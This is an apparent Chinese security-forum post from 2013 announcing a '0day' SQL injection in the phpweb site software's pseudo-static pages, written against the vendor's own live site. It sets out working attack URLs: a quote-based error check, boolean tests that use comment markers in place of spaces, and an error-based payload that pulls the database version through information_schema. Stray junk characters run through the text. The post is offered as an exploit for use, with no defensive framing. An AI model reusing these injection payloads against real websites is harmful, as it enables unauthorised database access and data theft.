找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2386|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
/ V/ Z# ~- Y  a+ f' e  {4 V
5 H7 r6 Z; n3 C% h* x$ `  Y" h+ W/ _1 v主站:http://phpweb.net/
% E7 `9 [8 q0 ]6 C$ z: J. n加’检测:
! ^# `( d! ~. T2 z6 B 7 F3 e! O- f* h* ^% {1 W
http://www.phpweb.net/down/html/?772′.html* ^- J) {) t$ a9 P, k" `% l6 R8 Z

8 k2 C: H, I- m. q' J/ w, e5 d出错
9 {3 p& y+ _. m0 q; X) Z+ U/ @存在注入。% J% Z. h. [: ?0 P4 c" @( Z
不能用空格,只能用/*罗
" p* F& j* `% |# W# Vhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
" w) E  q# |7 P* @4 r' l8 l
- g: o# n- S. Mhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
! x" `: T& w/ H: C7 e爆数据库版本:
2 F& w9 m4 j4 ]5 j6 t4 n 0 L; `4 b- E+ x: m
?
3 h- z* b/ K, A: ~1 \  g1 a( h1$ V6 K6 r# S+ a  O  H8 n
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html$ L6 A( a% n9 @
更新日期: 2013-01-03 13:39:50        
, J  {; K- V/ g0 i: N# j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表